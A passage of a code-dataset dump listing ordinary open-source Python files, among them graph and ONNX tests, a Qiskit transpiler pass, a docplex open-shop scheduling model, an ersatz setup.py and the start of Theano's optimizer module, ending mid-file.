ext (stringclasses, 9 values) | sha (stringlengths, 40) | content (stringlengths, 3 to 1.04M) |
---|---|---|
py | 7dfcd8b7e61e1f90bc8d830b4835175742900bc1 | """Unit tests for the :mod:`networkx.generators.duplication` module.
"""
import pytest
from networkx.generators.tests.test_duplication import TestDuplicationDivergenceGraph
from networkx.generators.tests.test_duplication import TestPartialDuplicationGraph
from graphscope.nx.generators.duplication import duplication_divergence_graph
from graphscope.nx.generators.duplication import partial_duplication_graph
from graphscope.nx.utils.compat import with_graphscope_nx_context
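# Note (descriptive, not in the original file): these test classes reuse the
# upstream NetworkX test suites. The with_graphscope_nx_context decorator copies
# the members of the referenced NetworkX test class onto the class defined below,
# so the same assertions are run against the graphscope.nx implementations.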
@pytest.mark.usefixtures("graphscope_session")
@with_graphscope_nx_context(TestDuplicationDivergenceGraph)
class TestDuplicationDivergenceGraph:
pass
@pytest.mark.usefixtures("graphscope_session")
@with_graphscope_nx_context(TestPartialDuplicationGraph)
class TestPartialDuplicationGraph:
pass
|
py | 7dfcda9a499da2b71c881b7bde6767ce228d305e | #!/usr/bin/env python
#
# check.py : Run all the test cases.
#
# ====================================================================
# Copyright 2013 Justin Erenkrantz and Greg Stein
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ====================================================================
import sys
import glob
import subprocess
import os
if __name__ == '__main__':
# get the test directory from the commandline, if set.
if len(sys.argv) > 1:
testdir = sys.argv[1]
else:
testdir = 'test'
# define test executable paths
if sys.platform == 'win32':
SERF_RESPONSE_EXE = 'serf_response.exe'
TEST_ALL_EXE = 'test_all.exe'
else:
SERF_RESPONSE_EXE = 'serf_response'
TEST_ALL_EXE = 'test_all'
SERF_RESPONSE_EXE = os.path.join(testdir, SERF_RESPONSE_EXE)
TEST_ALL_EXE = os.path.join(testdir, TEST_ALL_EXE)
# Find test responses and run them one by one
for case in glob.glob(testdir + "/testcases/*.response"):
print "== Testing %s ==" % (case)
try:
subprocess.check_call([SERF_RESPONSE_EXE, case])
except subprocess.CalledProcessError:
print "ERROR: test case %s failed" % (case)
print "== Running the unit tests =="
try:
subprocess.check_call(TEST_ALL_EXE)
except subprocess.CalledProcessError:
print "ERROR: test(s) failed in test_all"
|
py | 7dfcdcdace441781663db13ce3b236c51f793610 | #!/usr/bin/env python
###############################################################################
# Copyright Kitware Inc. and Contributors
# Distributed under the Apache License, 2.0 (apache.org/licenses/LICENSE-2.0)
# See accompanying Copyright.txt and LICENSE files for details
###############################################################################
import numpy as np
import sys
from danesfield.geon_fitting.tensorflow import utils
import pickle
import plyfile
import gdal
import argparse
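# Descriptive note (not in the original file): get_theta maps a signed axial
# length on a sphere of radius r to a polar angle. It clamps to pi below -0.8*r
# and to 0 above 0.9*r, and uses arccos(length / r) in between (mirrored for
# negative lengths).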
def get_theta(length, r):
if length < -0.8*r:
return np.pi
if length > 0.9*r:
return 0
if length < 0:
return np.pi-np.arccos((-1*length)/r)
return np.arccos(length/r)
def main(args):
parser = argparse.ArgumentParser()
parser.add_argument(
'--input_geon',
# default='../out_geon/D4_Curve_Geon.npy',
type=str,
help='input geon file.')
parser.add_argument(
'--input_dtm',
# default='/dvmm-filer2/projects/Core3D/D4_Jacksonville/DTMs/D4_DTM.tif',
type=str,
help='Input dtm') # D3_UCSD D4_Jacksonville
parser.add_argument(
'--output_mesh',
# default='../out_geon/D4_Curve_Mesh.ply',
type=str,
help='Output ply mesh file.')
parser.add_argument(
'--as-text',
action='store_true',
default=False,
help='Output ply as ASCII instead of binary')
args = parser.parse_args(args)
original_dtm = gdal.Open(args.input_dtm, gdal.GA_ReadOnly)
gt = original_dtm.GetGeoTransform() # captures origin and pixel size
left = gdal.ApplyGeoTransform(gt, 0, 0)[0]
top = gdal.ApplyGeoTransform(gt, 0, 0)[1]
right = gdal.ApplyGeoTransform(
gt, original_dtm.RasterXSize, original_dtm.RasterYSize)[0]
bottom = gdal.ApplyGeoTransform(
gt, original_dtm.RasterXSize, original_dtm.RasterYSize)[1]
dtm = original_dtm.ReadAsArray()
projection_model = {}
projection_model['corners'] = [left, top, right, bottom]
projection_model['project_model'] = gt
projection_model['scale'] = 1.0
geon_model = []
all_vertex = []
all_face = []
center_of_mess, geon_model = pickle.load(open(args.input_geon, "rb"))
for model in geon_model:
if model['name'] == 'poly_cylinder':
centroid, ex, ey, coefficients, min_axis_z,\
max_axis_z, ortho_x_min, ortho_x_max, fitted_indices_length, mean_diff = model[
'model']
vertex, face = utils.get_poly_ply_volume(dtm, projection_model, centroid, ex, ey,
coefficients, min_axis_z, max_axis_z,
ortho_x_min, ortho_x_max, len(all_vertex),
center_of_mess)
if len(all_vertex) > 0:
all_vertex.extend(vertex)
all_face.extend(face)
else:
all_vertex = vertex
all_face = face
elif model['name'] == 'sphere':
centroid, r, min_axis_z,\
max_axis_z, fitted_indices_length = model['model']
theta_max = get_theta(min_axis_z, r)
theta_min = get_theta(max_axis_z, r)
vertex, face = utils.get_sphere_volume(dtm, projection_model, centroid, r,
theta_min, theta_max, len(all_vertex),
center_of_mess)
if len(all_vertex) > 0:
all_vertex.extend(vertex)
all_face.extend(face)
else:
all_vertex = vertex
all_face = face
for idx in range(len(all_vertex)):
all_vertex[idx] = (all_vertex[idx][0]+center_of_mess[0],
all_vertex[idx][1]+center_of_mess[1],
all_vertex[idx][2]+center_of_mess[2])
all_vertex = np.array(
all_vertex, dtype=[('x', 'f4'), ('y', 'f4'), ('z', 'f4')])
all_face = np.array(all_face, dtype=[(
'vertex_indices', 'i4', (3,)), ('red', 'u1'), ('green', 'u1'), ('blue', 'u1')])
el_vertex = plyfile.PlyElement.describe(all_vertex, 'vertex')
el_face = plyfile.PlyElement.describe(all_face, 'face')
plyfile.PlyData([el_vertex, el_face],
text=args.as_text).write(args.output_mesh)
if __name__ == "__main__":
main(sys.argv[1:])
|
py | 7dfcdfd86698d12db59ae2053dbac584ae7fbdb3 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import os
from pulsar import Client, AuthenticationToken
client = Client(os.environ.get('SERVICE_URL'), authentication=AuthenticationToken(os.environ.get('AUTH_PARAMS')))
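# Illustrative sketch, not part of the original snippet: with the connected
# client you could create a producer on a hypothetical topic before closing, e.g.
#   producer = client.create_producer('my-topic')
#   producer.send('hello'.encode('utf-8'))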
client.close()
|
py | 7dfcdfe137a9d5bc6919ebdee656b2d487126806 | import sys, argparse
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument("--seed", type=int, default=0, help="seed")
parser.add_argument("--render", action="store_true")
parser.add_argument("--dataset_folder", type=str, default="../input_data/robo", help="folder for bodies")
parser.add_argument("--train_bodies", type=str, default="", help="Format: --train_bodies=0,100,300")
parser.add_argument("--test_bodies", type=str, default="", help="Format: --test_bodies=0,100,300")
parser.add_argument("--robo_bodies", type=str, default="", help="RoboGrammar rules.")
parser.add_argument("--test_steps", type=int, default=1000, help="total time steps for testing.")
parser.add_argument("--train_steps", type=float, default=2e6, help="total time steps for training.")
parser.add_argument("--eval_steps", type=float, default=1e5, help="eval policy every # steps during training.")
parser.add_argument("--learning_rate", type=float, default=3e-5, help="Setting learning rate.")
parser.add_argument("--num_venvs", type=int, default=16, help="How many envs you want to vectorize (train together).")
parser.add_argument("--with_bodyinfo", action="store_true")
parser.add_argument("--stack_frames", type=int, default=1, help="How many frames do you want to stack for training and testing. ")
parser.add_argument("--vec_normalize", action="store_true", help="use VecNormalize")
parser.add_argument("--with_checkpoint", action="store_true", help="save checkpoints along training.")
parser.add_argument("--threshold_threshold", type=float, default=0.0, help="activation function used in training. 0.0 is equivalent to ReLU")
parser.add_argument("--threshold_value", type=float, default=0.0, help="activation function used in training. 0.0 is equivalent to ReLU")
parser.add_argument("--initialize_weights_from", type=str, default="", help="better initialization from model file.")
parser.add_argument("--model_filename", type=str, default="", help="model to test.")
parser.add_argument("--body_folder", type=str, default="../input_data/bodies", help="folders that contains body xml files")
parser.add_argument("--topology_wrapper", type=str, default="", help="Switch for different experiments. Could be: same|diff")
parser.add_argument("--wrapper_case", type=str, default="Walker2DHopperWrapper", help="special wrapper for different experiments.")
parser.add_argument("--realign_method", type=str, default="", help="Only works when --topologies=same. See exp_012's hypothesis. Could be: general_only|joints_only|feetcontact_only|...")
parser.add_argument("--custom_align_max_joints", type=int, default=10, help="For CustomAlignWrapper. 8 for Vanilla4, 10 for RandomBody.")
parser.add_argument("--custom_alignment", type=str, default="", help="For CustomAlignWrapper. e.g. '0,1,2;0,1,2;2,0,1;1,0,2' for 4 observations with size of 3. ")
# parser.add_argument("--misalign_obs", action="store_true", help="first misalignment test.")
# parser.add_argument("--random_align_obs", action="store_true", help="second misalignment test.")
# parser.add_argument("--preserve_header", action="store_true", help="preserve_header when misalign others")
parser.add_argument("--random_even_same_body", action="store_true", help="all training bodies have different orders in observation.")
# parser.add_argument("--preserve_feet_contact", action="store_true", help="preserve_feet_contact when misalign the rest (only obs of joints)")
parser.add_argument("--disable_reordering", action="store_true", help="For MutantWrapper, add this to disable reordering even when use MutantWrapper. So at test time, when rendering, we can see the coloring.")
parser.add_argument("--ga_job_id", type=int, default=-1, help="For GA, the individual id.")
parser.add_argument("--ga_parent_id", type=int, default=-1, help="For GA, the individual id.")
parser.add_argument("--pns", action="store_true", help="Use Mlp with PNS instead of MlpPolicy.")
parser.add_argument("--pns_init", action="store_true", help="By default, first 8 numbers in observation is general information. Init with an I matrix in sensor weight.")
parser.add_argument("--one_snapshot_at", type=int, default=-1, help="For save images, only save one picture at certain step.")
parser.add_argument("--skip_solved_threshold", type=float, default=-1, help="Define a value for solved, skip training on that body until everyone pass that threshold. -1 for disabling this function.")
parser.add_argument("-tb", "--tensorboard", type=str, default="tensorboard", help="Folder name for tensorboard data.")
if "/tests/test_" in sys.argv[0]: # hack: unittest from file, standalone
args = parser.parse_args(sys.argv[1:])
sys.argv = [sys.argv[0]]
if sys.argv[0]=="python -m unittest": # hack: unittest from command line
args = parser.parse_args([])
else:
args = parser.parse_args()
args.train_steps = int(args.train_steps)
args.train_bodies_str = args.train_bodies
args.train_bodies = str2array(args.train_bodies_str)
args.test_bodies_str = args.test_bodies
args.test_bodies = str2array(args.test_bodies_str)
args.robo_bodies_str = args.robo_bodies
args.robo_bodies = str2array(args.robo_bodies_str)
return args
def str2array(_str, separation=","):
assert isinstance(_str, str)
array = []
if len(_str) > 0:
array = [int(x) for x in _str.split(separation)]
return array
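# Illustrative examples (not in the original file):
#   str2array("0,100,300")            -> [0, 100, 300]
#   str2array("")                     -> []
#   str2array("1;2", separation=";")  -> [1, 2]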
|
py | 7dfce01f39192d35a702d83d272c586666b50d39 | import torch
def ResNet18():
return torch.hub.load('pytorch/vision:v0.6.0', 'resnet18', pretrained=True)
|
py | 7dfce0e5867c902726b245e812fa4188955938a8 | import numpy as np
class Normalizer(object):
def __init__(self, input_dims, init_mean, init_var,
scale_factor=1, epsilon=1e-3, clip_range=None, activated=False):
self.activated = activated
self.input_dims = input_dims
self.sample_count = 0
self.history = []
self.history_mean = init_mean
self.history_var = init_var
if self.history_mean is None:
self.history_mean = np.zeros(self.input_dims)
if self.history_var is None:
self.history_var = np.ones(self.input_dims)
assert self.history_mean.shape == (self.input_dims,)
assert self.history_var.shape == (self.input_dims,)
self.epsilon = epsilon*np.ones(self.input_dims)
if clip_range is None:
clip_range = 1e3
self.input_clip_range = (-clip_range*np.ones(self.input_dims), clip_range*np.ones(self.input_dims))
self.scale_factor = scale_factor
def store_history(self, *args):
self.history.append(*args)
# update mean and var for z-score normalization
def update_mean(self):
if len(self.history) == 0:
return
new_sample_num = len(self.history)
new_history = np.array(self.history, dtype=np.float)
new_mean = np.mean(new_history, axis=0)
new_var = np.sum(np.square(new_history - new_mean), axis=0)
new_var = (self.sample_count * np.square(self.history_var) + new_var)
new_var /= (new_sample_num + self.sample_count)
self.history_var = np.sqrt(new_var)
new_mean = (self.sample_count * self.history_mean + new_sample_num * new_mean)
new_mean /= (new_sample_num + self.sample_count)
self.history_mean = new_mean
self.sample_count += new_sample_num
self.history.clear()
# pre-process inputs, currently using max-min-normalization
def __call__(self, inputs):
if self.activated:
inputs = (inputs - self.history_mean) / (self.history_var+self.epsilon)
inputs = np.clip(inputs, self.input_clip_range[0], self.input_clip_range[1])
return self.scale_factor*inputs
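# Illustrative usage sketch (not part of the original module); the values and
# input_dims=3 below are arbitrary assumptions:
#   norm = Normalizer(3, init_mean=None, init_var=None, activated=True)
#   norm.store_history(np.array([1.0, 2.0, 3.0]))
#   norm.store_history(np.array([2.0, 4.0, 6.0]))
#   norm.update_mean()                    # folds the buffered samples into mean/var
#   z = norm(np.array([1.5, 3.0, 4.5]))   # z-scored, clipped, scaled input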
|
py | 7dfce11a92e7691b17526ae51da326077fa8b70c | import numpy as np
import torch
import torch.nn as nn
from torch.autograd import Variable
from onnx2keras import onnx_to_keras, check_torch_keras_error
import onnx
class LayerTest(nn.Module):
def __init__(self, kernel_size=3, padding=1, stride=1):
super(LayerTest, self).__init__()
self.pool = nn.AvgPool3d(kernel_size=kernel_size, padding=padding, stride=stride)
def forward(self, x):
x = self.pool(x)
return x
if __name__ == '__main__':
max_error = 0
for kernel_size in [1, 3, 5, 7]:
for padding in [0, 1, 3]:
for stride in [1, 2, 3, 4]:
# RuntimeError: invalid argument 2: pad should be smaller than half of kernel size, but got padW = 1, padH = 1, kW = 1,
if padding > kernel_size / 2:
continue
model = LayerTest(kernel_size=kernel_size, padding=padding, stride=stride)
model.eval()
input_np = np.random.uniform(0, 1, (1, 3, 20, 224, 224))
input_var = Variable(torch.FloatTensor(input_np))
torch.onnx.export(model, input_var, "_tmpnet.onnx", verbose=True, input_names=['test_in'],
output_names=['test_out'])
onnx_model = onnx.load('_tmpnet.onnx')
k_model = onnx_to_keras(onnx_model, ['test_in'])
error = check_torch_keras_error(model, k_model, input_np)
print('Error:', error)
if max_error < error:
max_error = error
print('Max error: {0}'.format(max_error))
|
py | 7dfce1771b7bfa61f60f865baf11d7096f518e54 | #!/usr/bin/env python
"""
A setuptools based setup module.
See:
- https://packaging.python.org/en/latest/distributing.html
- https://github.com/pypa/sampleproject
To install:
1. Setup pypi by creating ~/.pypirc
[distutils]
index-servers =
pypi
pypitest
[pypi]
username=
password=
[pypitest]
username=
password=
2. Create the dist
python3 setup.py sdist bdist_wheel
3. Push
twine upload dist/*
"""
import os
import re
# Always prefer setuptools over distutils
from setuptools import setup, find_packages
ROOT = os.path.dirname(__file__)
def get_version():
"""
Reads the version from ersatz's __init__.py file.
We can't import the module because required modules may not
yet be installed.
"""
VERSION_RE = re.compile(r'''__version__ = ['"]([0-9.]+)['"]''')
init = open(os.path.join(ROOT, 'ersatz', '__init__.py')).read()
return VERSION_RE.search(init).group(1)
def get_description():
DESCRIPTION_RE = re.compile(r'''__description__ = ['"](.*)['"]''')
init = open(os.path.join(ROOT, 'ersatz', '__init__.py')).read()
return DESCRIPTION_RE.search(init).group(1)
setup(
name = 'ersatz',
# Versions should comply with PEP440. For a discussion on single-sourcing
# the version across setup.py and the project code, see
# https://packaging.python.org/en/latest/single_source_version.html
version = get_version(),
description = get_description(),
long_description = "Ersatz is a simple, language-agnostic toolkit for both training sentence segmentation models as well as providing pretrained, "
"high-performing models for sentence segmentation in a multilingual setting.",
# The project's main homepage.
url = 'https://github.com/rewicks/ersatz',
author = 'Rachel Wicks',
author_email='[email protected]',
maintainer_email='[email protected]',
license = 'Apache License 2.0',
python_requires = '>=3',
# See https://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers = [
# How mature is this project? Common values are
# 3 - Alpha
# 4 - Beta
# 5 - Production/Stable
'Development Status :: 5 - Production/Stable',
# Indicate who your project is intended for
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'Topic :: Scientific/Engineering',
'Topic :: Scientific/Engineering :: Artificial Intelligence',
'Topic :: Text Processing',
# Pick your license as you wish (should match "license" above)
'License :: OSI Approved :: Apache Software License',
# Specify the Python versions you support here. In particular, ensure
# that you indicate whether you support Python 2, Python 3 or both.
'Programming Language :: Python :: 3 :: Only',
],
# What does your project relate to?
keywords = ['sentence segmentation, data processing, preprocessing, evaluation, NLP, natural language processing, computational linguistics'],
# Which packages to deploy (currently sacrebleu, sacrebleu.matrics and sacrebleu.tokenizers)?
packages = find_packages(),
# Mark ersatz (and recursively all its sub-packages) as supporting mypy type hints (see PEP 561).
package_data={"ersatz": ["py.typed"]},
# List run-time dependencies here. These will be installed by pip when
# your project is installed. For an analysis of "install_requires" vs pip's
# requirements files see:
# https://packaging.python.org/en/latest/requirements.html
install_requires = [
'typing;python_version<"3.5"',
'torch==1.7.1',
'sentencepiece==0.1.95',
'tensorboard==2.4.1',
'progressbar2'
],
# List additional groups of dependencies here (e.g. development
# dependencies). You can install these using the following syntax,
# for example:
# $ pip install -e .[dev,test]
extras_require = {},
# To provide executable scripts, use entry points in preference to the
# "scripts" keyword. Entry points provide cross-platform support and allow
# pip to create the appropriate form of executable for the target platform.
entry_points={
'console_scripts': [
'ersatz = ersatz.split:main',
'ersatz_train = ersatz.trainer:main',
'ersatz_score = ersatz.score:main',
'ersatz_preprocess = ersatz.dataset:main'
],
},
)
|
py | 7dfce1cd5eb531e8eb235dbd1fa36bf32645fea7 | # This code is part of Qiskit.
#
# (C) Copyright IBM 2017, 2019.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""Convert a circuit in ``U3, CX`` to ``Rx, Ry, Rxx`` without unrolling or simplification."""
import warnings
from qiskit.transpiler.basepasses import TransformationPass
from qiskit.exceptions import QiskitError
from qiskit.converters import circuit_to_dag
from qiskit.circuit.library.standard_gates import U3Gate, CXGate
from qiskit.transpiler.passes import Unroller
from qiskit.quantum_info.synthesis.one_qubit_decompose import OneQubitEulerDecomposer
from qiskit.quantum_info.synthesis.ion_decompose import cnot_rxx_decompose
class MSBasisDecomposer(TransformationPass):
"""Convert a circuit in ``U3, CX`` to ``Rx, Ry, Rxx`` without unrolling or simplification."""
supported_input_gates = (U3Gate, CXGate)
def __init__(self, basis_gates):
"""Deprecated
MSBasisDecomposer initializer.
Args:
basis_gates (list[str]): Target basis names, e.g. `['rx', 'ry', 'rxx', 'ms']` .
"""
warnings.warn(
"The qiskit.transpiler.passes.basis.MSBasisDecomposer class is "
"deprecated as of 0.16.0, and will be removed no earlier "
"than 3 months after that release date. You should use the "
"qiskit.transpiler.passes.basis.BasisTranslator class "
"instead.",
DeprecationWarning,
stacklevel=2,
)
super().__init__()
self.basis_gates = basis_gates
# Require all gates be unrolled to either a basis gate or U3,CX before
# running the decomposer.
input_basis = set(basis_gates).union(["u3", "cx"])
self.requires = [Unroller(list(input_basis))]
def run(self, dag):
"""Run the MSBasisDecomposer pass on `dag`.
Replace U3,CX nodes in input dag with equivalent Rx,Ry,Rxx gates.
Args:
dag(DAGCircuit): input dag
Raises:
QiskitError: if input dag includes gates outside U3,CX.
Returns:
DAGCircuit: output dag
"""
one_q_decomposer = OneQubitEulerDecomposer(basis="XYX")
cnot_decomposition = cnot_rxx_decompose()
for node in dag.op_nodes():
basic_insts = ["measure", "reset", "barrier", "snapshot", "delay"]
if node.name in basic_insts:
# TODO: this is legacy behavior. basic_insts should be removed and these
# instructions should be part of the device-reported basis. Currently, no
# backend reports "measure", for example.
continue
if node.name in self.basis_gates: # If already a base, ignore.
continue
if not isinstance(node.op, self.supported_input_gates):
raise QiskitError(
"Cannot convert the circuit to the given basis, %s. "
"No rule to expand instruction %s." % (str(self.basis_gates), node.op.name)
)
if isinstance(node.op, U3Gate):
replacement_circuit = one_q_decomposer(node.op)
elif isinstance(node.op, CXGate):
# N.B. We can't circuit_to_dag once outside the loop because
# substitute_node_with_dag will modify the input DAG if the
# node to be replaced is conditional.
replacement_circuit = cnot_decomposition
else:
raise QiskitError(
"Unable to handle instruction (%s, %s)." % (node.op.name, type(node.op))
)
replacement_dag = circuit_to_dag(replacement_circuit)
# N.B. wires kwarg can be omitted for both 1Q and 2Q substitutions.
# For 1Q, one-to-one mapping is always correct. For 2Q,
# cnot_rxx_decompose follows convention of control as q[0], target
# as q[1], which matches qarg order in CX node.
dag.substitute_node_with_dag(node, replacement_dag)
return dag
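# Illustrative only (not part of the original file): the deprecated pass could be
# driven directly on a small U3/CX circuit, e.g.
#   from qiskit import QuantumCircuit
#   qc = QuantumCircuit(2)
#   qc.u3(0.1, 0.2, 0.3, 0)
#   qc.cx(0, 1)
#   out_dag = MSBasisDecomposer(['rx', 'ry', 'rxx']).run(circuit_to_dag(qc))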
|
py | 7dfce2960b8fad0e6d21f9985f189326c80e1444 | # --------------------------------------------------------------------------
# Source file provided under Apache License, Version 2.0, January 2004,
# http://www.apache.org/licenses/
# (c) Copyright IBM Corp. 2015, 2016
# --------------------------------------------------------------------------
"""
This problem can be described as follows: a finite set of operations has to be
processed on a given set of machines.
Each operation has a specific processing time during which it may not be interrupted.
Operations are grouped in jobs, so that each operation belongs to exactly one job.
Furthermore, each operation requires exactly one machine for processing.
The objective of the problem is to schedule all operations, i.e., to determine
their start time, so as to minimize the maximum completion time (makespan)
given the additional constraints that: operations which belong to the same job and
operations which use the same machine cannot be processed simultaneously.
This problem is similar to the one proposed in flow_shop.py except that
job operations can be executed in any order.
Please refer to documentation for appropriate setup of solving configuration.
"""
from docplex.cp.model import *
import os
#-----------------------------------------------------------------------------
# Initialize the problem data
#-----------------------------------------------------------------------------
# Read the input data file.
# Available files are openshop_default, and different openshop_XXXX.
# First line contains the number of jobs, and the number of machines.
# The rest of the file consists of one line per job that contains the list of
# operations given as durations for each machines.
filename = os.path.dirname(os.path.abspath(__file__)) + '/data/openshop_default.data'
with open(filename, 'r') as file:
NB_JOBS, NB_MACHINES = [int(v) for v in file.readline().split()]
JOB_DURATIONS = [[int(v) for v in file.readline().split()] for i in range(NB_JOBS)]
#-----------------------------------------------------------------------------
# Build the model
#-----------------------------------------------------------------------------
# Create model
mdl = CpoModel()
# Create one interval variable per job operation
job_operations = [[interval_var(size=JOB_DURATIONS[j][m], name='J{}-M{}'.format(j,m)) for m in range(NB_MACHINES)] for j in range(NB_JOBS)]
# All operations that belong to the same job must not overlap
mdl.add(no_overlap(job_operations[i][j] for j in range(NB_MACHINES)) for i in range(NB_JOBS))
# All operations executed on the same machine must not overlap
mdl.add(no_overlap(job_operations[i][j] for i in range(NB_JOBS)) for j in range(NB_MACHINES))
# Minimize the completion time (makespan)
mdl.add(minimize(max(end_of(job_operations[i][j]) for i in range(NB_JOBS) for j in range(NB_MACHINES))))
#-----------------------------------------------------------------------------
# Solve the model and display the result
#-----------------------------------------------------------------------------
# Solve model
print('Solving model...')
res = mdl.solve(FailLimit=10000,TimeLimit=10)
print('Solution: ')
res.print_solution()
# Display solution
import docplex.cp.utils_visu as visu
if res and visu.is_visu_enabled():
visu.timeline('Solution for open-shop ' + filename)
visu.panel('Jobs')
for i in range(NB_JOBS):
visu.sequence(name='J' + str(i),
intervals=[(res.get_var_solution(job_operations[i][j]), j, 'M' + str(j)) for j in range(NB_MACHINES)])
visu.panel('Machines')
for j in range(NB_MACHINES):
visu.sequence(name='M' + str(j),
intervals=[(res.get_var_solution(job_operations[i][j]), j, 'J' + str(i)) for i in range(NB_JOBS)])
visu.show()
|
py | 7dfce29da8239f717e6e8c2fe66fc89c67a5e702 | import time
from unittest import TestCase
from nose import SkipTest
import pyelasticsearch
from elasticutils import get_es, S
class ElasticTestCase(TestCase):
"""Superclass for ElasticSearch-using test cases.
:cvar index_name: string; name of the index to use
:cvar skip_tests: bool; if ElasticSearch isn't available, then
this is True and therefore tests should be skipped for this
class
For examples of usage, see the other ``test_*.py`` files.
"""
index_name = 'elasticutilstest'
mapping_type_name = 'elasticutilsmappingtype'
es_settings = {
'urls': ['http://localhost:9200']
}
skip_tests = False
@classmethod
def setup_class(cls):
"""Class setup for tests.
Checks to see if ES is running and if not, sets ``skip_test``
to True on the class.
"""
# Note: TestCase has no setup_class
try:
get_es().health()
except pyelasticsearch.exceptions.ConnectionError:
cls.skip_tests = True
@classmethod
def teardown_class(cls):
"""Class tear down for tests."""
if cls.skip_tests:
return
cls.cleanup_index()
def setUp(self):
"""Set up a single test.
:raises SkipTest: if ``skip_tests`` is True for this
class/instance
"""
if self.skip_tests:
raise SkipTest
super(ElasticTestCase, self).setUp()
@classmethod
def get_es(cls):
return get_es(**cls.es_settings)
@classmethod
def get_s(cls, mapping_type=None):
if mapping_type is not None:
s = S(mapping_type)
else:
s = S()
return (s.es(**cls.es_settings)
.indexes(cls.index_name)
.doctypes(cls.mapping_type_name))
@classmethod
def create_index(cls):
es = cls.get_es()
try:
es.delete_index(cls.index_name)
except pyelasticsearch.exceptions.ElasticHttpNotFoundError:
pass
es.create_index(cls.index_name)
@classmethod
def index_data(cls, data, index=None, doctype=None, create_index=False):
index = index or cls.index_name
doctype = doctype or cls.mapping_type_name
es = cls.get_es()
if create_index:
cls.create_index()
# TODO: change this to a bulk index
for item in data:
es.index(index, doctype, item, id=item['id'])
cls.refresh()
@classmethod
def cleanup_index(cls):
es = cls.get_es()
try:
es.delete_index(cls.index_name)
except pyelasticsearch.exceptions.ElasticHttpNotFoundError:
pass
@classmethod
def refresh(cls, timesleep=0):
"""Refresh index after indexing.
This refreshes the index specified by `self.index_name`.
:arg timesleep: int; number of seconds to sleep after telling
ElasticSearch to refresh
"""
cls.get_es().refresh(cls.index_name)
if timesleep:
time.sleep(timesleep)
def facet_counts_dict(qs, field):
return dict((t['term'], t['count']) for t in qs.facet_counts()[field])
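# Illustrative only (not in the original file): given a search object qs whose
# facet_counts() response includes a hypothetical field 'tag',
#   facet_counts_dict(qs, 'tag')
# collapses that facet response into a {term: count} dict.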
|
py | 7dfce3cf045c5d2bbac9718dbd41e5afa3c380ac | """
Defines the base class for optimizations as well as a certain
amount of useful generic optimization tools.
"""
import copy
import logging
import sys
import time
import numpy
import graph
from fg import InconsistencyError
import op
import utils
import unify
import toolbox
import theano
from theano import config
from theano.gof.python25 import any, all, deque
from theano.configparser import AddConfigVar, BoolParam
#if sys.version_info[:2] >= (2,5):
# from collections import defaultdict
_logger = logging.getLogger('theano.gof.opt')
AddConfigVar('time_seq_optimizer',
"Should SeqOptimizer print the time taked by each of its optimizer",
BoolParam(False),
in_c_key=False)
AddConfigVar('time_eq_optimizer',
"Should EquilibriumOptimizer print the time taken by each optimizer",
BoolParam(False),
in_c_key=False)
import destroyhandler as dh
import traceback
_optimizer_idx = [0]
def _list_of_nodes(fgraph):
return list(graph.io_toposort(fgraph.inputs, fgraph.outputs))
class Optimizer(object):
"""WRITEME
An L{Optimizer} can be applied to an L{FunctionGraph} to transform it.
It can represent an optimization or in general any kind
of transformation you could apply to an L{FunctionGraph}.
"""
def __hash__(self):
if not hasattr(self, '_optimizer_idx'):
self._optimizer_idx = _optimizer_idx[0]
_optimizer_idx[0] += 1
return self._optimizer_idx
def apply(self, fgraph):
"""WRITEME
Applies the optimization to the provided L{FunctionGraph}. It may use all
the methods defined by the L{FunctionGraph}. If the L{Optimizer} needs
to use a certain tool, such as an L{InstanceFinder}, it can do
so in its L{add_requirements} method.
"""
pass
def optimize(self, fgraph, *args, **kwargs):
"""WRITEME
This is meant as a shortcut to::
opt.add_requirements(fgraph)
opt.apply(fgraph)
"""
self.add_requirements(fgraph)
return self.apply(fgraph, *args, **kwargs)
def __call__(self, fgraph):
"""WRITEME
Same as self.optimize(fgraph)
"""
return self.optimize(fgraph)
def add_requirements(self, fgraph):
"""WRITEME
Add features to the fgraph that are required to apply the optimization.
For example:
fgraph.attach_feature(History())
fgraph.attach_feature(MyFeature())
etc.
"""
pass
def print_summary(self, stream=sys.stdout, level=0, depth=-1):
name = getattr(self, 'name', None)
print >> stream, "%s%s %s id=%i" % (
(' ' * level), self.__class__.__name__, name, id(self))
def print_profile(self, prof):
if prof is not None:
raise NotImplementedError(
"The function print_profile must be overrided if the"
" optimizer return profiling information.")
class FromFunctionOptimizer(Optimizer):
"""WRITEME"""
def __init__(self, fn):
self.apply = fn
def add_requirements(self, fgraph):
# Added by default
#fgraph.attach_feature(toolbox.ReplaceValidate())
pass
def print_summary(self, stream=sys.stdout, level=0, depth=-1):
print >> stream, "%s%s id=%i" % (
' ' * level,
str(self.apply),
id(self))
def __call__(self, *args, **kwargs):
return self.fn(*args, **kwargs)
def optimizer(f):
"""decorator for FromFunctionOptimizer"""
rval = FromFunctionOptimizer(f)
rval.__name__ = f.__name__
return rval
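# Illustrative sketch (not in the original source): the decorator turns a plain
# function into a FromFunctionOptimizer, e.g.
#   @optimizer
#   def do_nothing_opt(fgraph):
#       pass
# do_nothing_opt is then an Optimizer instance and can be placed in a SeqOptimizer.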
class SeqOptimizer(Optimizer, list):
#inherit from Optimizer first to get Optimizer.__hash__
"""WRITEME
Takes a list of L{Optimizer} instances and applies them
